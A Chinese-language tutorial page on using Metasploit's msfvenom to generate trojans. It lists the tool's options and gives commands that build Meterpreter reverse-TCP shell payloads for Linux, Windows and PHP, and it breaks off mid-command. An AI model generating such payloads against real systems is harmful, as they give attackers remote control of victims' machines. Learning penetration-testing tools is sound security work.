9.利用msfvenom生成木马 | 您所在的位置:网站首页 › 加纳附近的国家 › 9.利用msfvenom生成木马 |
这篇文章来介绍一下msf中一个生成木马的msfvenom模块。 msfvenom命令行选项如下: 英文原版: 中文版: Options: -p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled 为payload预先指定一个NOP滑动长度 -f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(编码器) -a, --arch 指定payload的目标架构,这里x86是32位,x64是64位 -platform 指定payload的目标平台 -s, --space 设定有效攻击荷载的最大长度 -b, --bad-chars 设定规避字符集,比如: '\x00\xff' -i, --iterations 指定payload的编码次数 -c, --add-code 指定一个附加的win32 shellcode文件 -x, --template 指定一个自定义的可执行文件作为模板 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项 -o, --out 保存payload -v, --var-name 指定一个自定义的变量,以确定输出格式 --shellest 最小化生成payload -h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表这里举出一些利用msfvenom生成shell的命令: Linux: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfWindows: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exePHP: msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' |
CopyRight 2018-2019 实验室设备网 版权所有 |